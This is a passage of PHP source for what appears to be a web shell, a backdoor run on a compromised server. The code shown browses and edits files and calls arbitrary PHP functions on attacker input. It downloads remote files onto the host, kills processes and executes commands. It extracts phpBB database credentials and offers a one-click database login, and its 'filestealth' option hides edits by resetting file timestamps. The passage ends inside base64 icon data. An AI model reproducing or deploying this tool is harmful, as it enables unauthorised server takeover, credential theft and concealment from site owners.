     $gr = posix_getgrgid(filegroup($v));
     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
    }
    $row[] = fileperms($v);
    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
    elseif (is_link($v)) {$objects["links"][] = $row;}
    elseif (is_dir($v)) {$objects["folders"][] = $row;}
    elseif (is_file($v)) {$objects["files"][] = $row;}
    $i++;
   }
   $row = array();
   $row[] = "<b>Name</b>";
   $row[] = "<b>Size</b>";
   $row[] = "<b>Date Modified</b>";
   if (!$win) {$row[] = "<b>Owner/Group</b>";}
   $row[] = "<b>Perms</b>";
   $row[] = "<b>Action</b>";
   $parsesort = parsesort($sort);
   $sort = $parsesort[0].$parsesort[1];
   $k = $parsesort[0];
   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
   $y = " <a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
   $y .= "<img src=\"".$surl."x=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
   $row[$k] .= $y;
   for($i=0;$i<count($row)-1;$i++) {
    if ($i != $k) {$row[$i] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
   }
   $v = $parsesort[0];
   usort($objects["folders"], "tabsort");
   usort($objects["links"], "tabsort");
   usort($objects["files"], "tabsort");
   if ($parsesort[1] == "d") {
    $objects["folders"] = array_reverse($objects["folders"]);
    $objects["files"] = array_reverse($objects["files"]);
   }
   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
   $tab = array();
   $tab["cols"] = array($row);
   $tab["head"] = array();
   $tab["folders"] = array();
   $tab["links"] = array();
   $tab["files"] = array();
   $i = 0;
   foreach ($objects as $a) {
    $v = $a[0];
    $o = basename($v);
    $dir = dirname($v);
    if ($disp_fullpath) {$disppath = $v;}
    else {$disppath = $o;}
    $disppath = str2mini($disppath,60);
    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
    foreach ($regxp_highlight as $r) {
     if (ereg($r[0],$o)) {
      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; bogelexit();}
      else {
       $r[1] = round($r[1]);
       $isdir = is_dir($v);
       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
        $disppath = $r[2].$disppath.$r[3];
        if ($r[4]) {break;}
       }
      }
     }
    }
    $uo = urlencode($o);
    $ud = urlencode($dir);
    $uv = urlencode($v);
    $row = array();
    if ($o == ".") {
     $row[] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."x=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
     $row[] = "CURDIR";
    }
    elseif ($o == "..") {
     $row[] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."x=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
     $row[] = "UPDIR";
    }
    elseif (is_dir($v)) {
     if (is_link($v)) {
      $disppath .= " => ".readlink($v);
      $type = "LINK";
      $row[] = "<a href=\"".$surl."x=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."x=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
     }
     else {
      $type = "DIR";
      $row[] = "<a href=\"".$surl."x=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."x=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
     }
     $row[] = $type;
    }
    elseif(is_file($v)) {
     $ext = explode(".",$o);
     $c = count($ext)-1;
     $ext = $ext[$c];
     $ext = strtolower($ext);
     $row[] = "<a href=\"".$surl."x=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."x=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
     $row[] = view_size($a[1]);
    }
    $row[] = date("d.m.Y H:i:s",$a[2]);
    if (!$win) {$row[] = $a[3];}
    $row[] = "<a href=\"".$surl."x=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
    if (is_dir($v)) {$row[] = "<a href=\"".$surl."x=d&d=".$uv."\"><img src=\"".$surl."x=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
    else {$row[] = "<a href=\"".$surl."x=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."x=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."x=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."x=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."x=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."x=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
    elseif (is_link($v)) {$tab["links"][] = $row;}
    elseif (is_dir($v)) {$tab["folders"][] = $row;}
    elseif (is_file($v)) {$tab["files"][] = $row;}
    $i++;
   }
  }
  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  echo "<div class=barheader>[+] ";
  if (!empty($fx_infohead)) { echo $fx_infohead; }
  else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
  echo " [+]</div>
";
  echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=x value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
     "<table class=explorer>";
  foreach($table as $row) {
   echo "<tr>";
   foreach($row as $v) {echo "<td>".$v."</td>";}
   echo "</tr>
";
  }
  echo "</table>".
     "<script>".
     "function ls_setcheckboxall(status) {".
     " var id = 1; var num = ".(count($table)-2).";".
     " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
     "}".
     "function ls_reverse_all() {".
     " var id = 1; var num = ".(count($table)-2).";".
     " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
     "}".
     "</script>".
     "<div align=\"right\">".
     "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
     "<img src=\"".$surl."x=img&img=arrow_ltr\" border=\"0\">";
  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  }
  echo "<select name=x><option value=\"".$x."\">With selected:</option>";
  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  if ($usefsbuff) {
   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  }
  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
  echo "</form>";
 }
}
if ($x == "tools") 
{

}
if ($x == "phpfsys") {
 echo "<div align=left>";
 $fsfunc = $phpfsysfunc;
 if ($fsfunc=="copy") {
  if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...
";}
  else { echo "<b>Success!</b> $arg1 copied to $arg2
"; }
 }
 elseif ($fsfunc=="rename") {
  if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!
";}
  else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2
"; }
 }
 elseif ($fsfunc=="chmod") {
  if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!
";}
  else { echo "<b>Perm for $arg1 changed to $arg2!</b>
"; }
 }
 elseif ($fsfunc=="read") {
  $hasil = @file_get_contents($arg1);
  echo "<b>Filename:</b> $arg1<br>";
  echo "<textarea cols=150 rows=20>";
  echo $hasil;
  echo "</textarea>
";
 }
 elseif ($fsfunc=="write") {
  if(@file_put_contents($d.$arg1,$arg2)) {
   echo "<b>Saved!</b> ".$d.$arg1;
  }
  else { echo "<div class=fxerrmsg>Couldn't write to $arg1!</div>"; }
 }
 elseif ($fsfunc=="downloadbin") {
  $handle = fopen($arg1, "rb");
  $contents = '';
  while (!feof($handle)) {
   $contents .= fread($handle, 8192);
  }
  $r = @fopen($d.$arg2,'w');
  if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
  else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
  fclose($r);
  fclose($handle);
 }
 elseif ($fsfunc=="download") {
  $text = implode('', file($arg1));
  if ($text) {
   $r = @fopen($d.$arg2,'w');
   if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
   else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
   fclose($r);
  }
  else { echo "<div class=fxerrmsg>Couldn't download from $arg1!</div>";}
 }
 elseif ($fsfunc=='mkdir') {
  $thedir = $d.$arg1;
  if ($thedir != $d) {
   if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
   elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
   else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
  }
  else { echo "Couldn't create current dir:<b> $thedir</b>"; }
 }
 elseif ($fsfunc=='fwritabledir') {
  function recurse_dir($dir,$max_dir) {
   global $dir_count;
   $dir_count++;
   if( $cdir = @dir($dir) ) {
    while( $entry = $cdir-> read() ) {
     if( $entry != '.' && $entry != '..' ) {
      if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
       if ($dir_count > $max_dir) { return; }
       echo "[".$dir_count."] ".$dir.$entry."
";
       recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
      }
     }
    }
    $cdir->close();
   }
  }
  if (!$arg1) { $arg1 = $d; }
  if (!$arg2) { $arg2 = 10; }
  echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<br>";
  echo "<pre>";
  recurse_dir($arg1,$arg2);
  echo "</pre>";
  $total = $dir_count - 1;
  echo "<b>Founds:</b> ".$total." of <b>Max</b> $arg2";
 }
 else {
  if (!$arg1) { echo "<div class=fxerrmsg>No operation! Please fill parameter [A]!</div>
"; }
  else {
   if ($hasil = $fsfunc($arg1)) {
    echo "<b>Result of $fsfunc $arg1:</b><br>";
    if (!is_array($hasil)) { echo "$hasil
"; }
    else {
     echo "<pre>";
     foreach ($hasil as $v) { echo $v."
"; }
     echo "</pre>";
    }
   }
   else { echo "<div class=fxerrmsg>$fsfunc $arg1 failed!</div>
"; }
  }
 }
 echo "</div>
";
}

if ($x == "processes") {
 echo "<div class=barheader>.: Processes :.</div>";
 if (!$win) { $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":""); }
 else { $handler = "tasklist"; }
 $ret = myshellexec($handler);
 if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
 else {
  if (empty($processes_sort)) {$processes_sort = $sort_default;}
  $parsesort = parsesort($processes_sort);
  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  $k = $parsesort[0];
  if ($parsesort[1] != "a") {
   $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."x=img&img=sort_desc\" border=\"0\"></a>";
  }
  else {
   $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."x=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
  }
  $ret = htmlspecialchars($ret);
  if (!$win) {
   if ($pid) {
    if (is_null($sig)) {$sig = 9;}
    echo "Sending signal ".$sig." to #".$pid."... ";
    if (posix_kill($pid,$sig)) {echo "OK.";}
    else {echo "ERROR.";}
   }
   while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
   $stack = explode("
",$ret);
   $head = explode(" ",$stack[0]);
   unset($stack[0]);
   for($i=0;$i<count($head);$i++) {
    if ($i != $k) {$head[$i] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
   }
   $prcs = array();
   foreach ($stack as $line) {
    if (!empty($line)) {
     echo "<tr>";
     $line = explode(" ",$line);
     $line[10] = join(" ",array_slice($line,10));
     $line = array_slice($line,0,11);
     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
     $line[] = "<a href=\"".$surl."x=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
     $prcs[] = $line;
     echo "</tr>";
    }
   }
  }
  else {
   while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
   while (ereg("=",$ret)) {$ret = str_replace("=","",$ret);}
   $ret = convert_cyr_string($ret,"d","w");
   $stack = explode("
",$ret);
   unset($stack[0],$stack[2]);
   $stack = array_values($stack);
   $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
   $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
   $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
   $head = explode(" ",$stack[0]);
   $stack = array_slice($stack,1);
   $head = array_values($head);
   if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."x=img&img=sort_desc\" border=\"0\"></a>"; }
   else { $y = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."x=img&img=sort_asc\" border=\"0\"></a>"; }
   if ($k > count($head)) {$k = count($head)-1;}
   for($i=0;$i<count($head);$i++) {
    if ($i != $k) { $head[$i] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
   }
   $prcs = array();
   unset($stack[0]);
   foreach ($stack as $line) {
    if (!empty($line)) {
     $line = explode(" ",$line);
     $line[4] = str_replace(".","",$line[4]);
     $line[4] = intval($line[4]) * 1024;
     unset($line[5]);
     $prcs[] = $line;
    }
   }
  }
  $head[$k] = "<b>".$head[$k]."</b>".$y;
  $v = $processes_sort[0];
  usort($prcs,"tabsort");
  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  $tab = array();
  $tab[] = $head;
  $tab = array_merge($tab,$prcs);
  echo "<table class=explorer>";
  foreach($tab as $i=>$k) {
   echo "<tr>";
   foreach($k as $j=>$v) {
    if ($win and $i > 0 and $j == 4) {$v = view_size($v);}
    echo "<td>".$v."</td>";
   }
   echo "</tr>";
  }
  echo "</table>";
 }
}

if ($x == "f") {
 echo "<div align=left>";
 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."x=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
 }
 else {
  $r = @file_get_contents($d.$f);
  $ext = explode(".",$f);
  $c = count($ext)-1;
  $ext = $ext[$c];
  $ext = strtolower($ext);
  $rft = "";
  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  if (empty($ft)) {$ft = $rft;}
  $arr = array(
    array("info","info"),
    array("html","html"),
    array("txt","txt"),
    array("Code","code"),
    array("Session","phpsess"),
    array("exe","exe"),
    array("SDB","sdb"),
    array("img","img"),
    array("ini","ini"),
    array("download","download"),
    array("notepad","notepad"),
    array("edit","edit")
  );
  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."x=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  foreach($arr as $t) {
   if ($t[1] == $rft) {echo " <a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
   else {echo " <a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
   echo " (<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  }
  echo "<hr size=\"1\" noshade>";
  if ($ft == "info") {
   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
   if (!$win) {
    echo "<tr><td><b>Owner/Group</b></td><td> ";
    $ow = posix_getpwuid(fileowner($d.$f));
    $gr = posix_getgrgid(filegroup($d.$f));
    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
   }
   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."x=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
   $fi = fopen($d.$f,"rb");
   if ($fi) {
    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
    $n = 0;
    $a0 = "00000000<br>";
    $a1 = "";
    $a2 = "";
    for ($i=0; $i<strlen($str); $i++) {
     $a1 .= sprintf("%02X",ord($str[$i]))." ";
     switch (ord($str[$i])) {
      case 0: $a2 .= "<font>0</font>"; break;
      case 32:
      case 10:
      case 13: $a2 .= "&nbsp;"; break;
      default: $a2 .= htmlspecialchars($str[$i]);
     }
     $n++;
     if ($n == $hexdump_rows) {
      $n = 0;
      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
      $a1 .= "<br>";
      $a2 .= "<br>";
     }
    }
    echo "<table border=1 bgcolor=#666666>".
       "<tr><td bgcolor=#666666>".$a0."</td>".
       "<td bgcolor=#000000>".$a1."</td>".
       "<td bgcolor=#000000>".$a2."</td>".
       "</tr></table><br>";
   }
   
  echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
    <nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
    <nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
    <nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
    <nobr>[<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
    <P>";
 }
 elseif ($ft == "html") {
  if ($white) {@ob_clean();}
  echo $r;
  if ($white) {bogelexit();}
 }
 elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
 elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
 elseif ($ft == "phpsess") {
  echo "<pre>";
  $v = explode("|",$r);
  echo $v[0]."<br>";
  var_dump(unserialize($v[1]));
  echo "</pre>";
 }
 elseif ($ft == "exe") {
  $ext = explode(".",$f);
  $c = count($ext)-1;
  $ext = $ext[$c];
  $ext = strtolower($ext);
  $rft = "";
  foreach($exeftypes as $k=>$v)
  {
  if (in_array($ext,$v)) {$rft = $k; break;}
  }
  $cmd = str_replace("%f%",$f,$rft);
  echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=x value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
 }
 elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
 elseif ($ft == "code") {
  if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
   $arr = explode("
",$r);
   if (count($arr == 18)) {
    include($d.$f);
    echo "<b>phpBB configuration is detected in this file!<br>";
    if ($dbms == "mysql4") {$dbms = "mysql";}
    if ($dbms == "mysql") {echo "<a href=\"".$surl."x=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
    else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
    echo "Parameters for manual connect:<br>";
    $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
    foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
    echo "</b><hr size=\"1\" noshade>";
   }
  }
  echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  if (!empty($white)) {@ob_clean();}
  highlight_file($d.$f);
  if (!empty($white)) {bogelexit();}
  echo "</div>";
 }
 elseif ($ft == "download") {
  @ob_clean();
  header("Content-type: application/octet-stream");
  header("Content-length: ".filesize($d.$f));
  header("Content-disposition: attachment; filename=\"".$f."\";");
  echo $r;
  exit;
 }
 elseif ($ft == "notepad") {
  @ob_clean();
  header("Content-type: text/plain");
  header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  echo($r);
  exit;
 }
 elseif ($ft == "img") {
  $inf = getimagesize($d.$f);
  if (!$white) {
   if (empty($imgsize)) {$imgsize = 50;}
   $width = $inf[0]/100*$imgsize;
   $height = $inf[1]/100*$imgsize;
   echo "<center><b>Size:</b>&nbsp;";
   $sizes = array("100");
   foreach ($sizes as $v) {
    echo "<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
    if ($imgsize != $v ) {echo $v;}
    else {echo "<u>".$v."</u>";}
    echo "</a>&nbsp;&nbsp;&nbsp;";
   }
   echo "<br><br><img src=\"".$surl."x=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
  }
  else {
   @ob_clean();
   $ext = explode($f,".");
   $ext = $ext[count($ext)-1];
   header("Content-type: ".$inf["mime"]);
   readfile($d.$f);
   exit;
  }
 }
 elseif ($ft == "edit") {
  if (!empty($submit))
  {
  if ($filestealth) {$stat = stat($d.$f);}
  $fp = fopen($d.$f,"w");
  if (!$fp) {echo "<b>Can't write to file!</b>";}
  else
  {
   echo "<b>Saved!</b>";
   fwrite($fp,$edit_text);
   fclose($fp);
   if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
   $r = $edit_text;
  }
  }
  $rows = count(explode("
",$r));
  if ($rows < 10) {$rows = 10;}
  if ($rows > 30) {$rows = 30;}
  echo "<form action=\"".$surl."x=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."x=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
 }
 elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
 else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
}
echo "</div>
";
}
}
else {
@ob_clean();
$images = array(
"arrow_ltr"=>
"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQSIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
"back"=>
"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
"Wg0JADs=",
"buffer"=>
"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
"change"=>
"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
"zMshADs=",
"delete"=>
"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
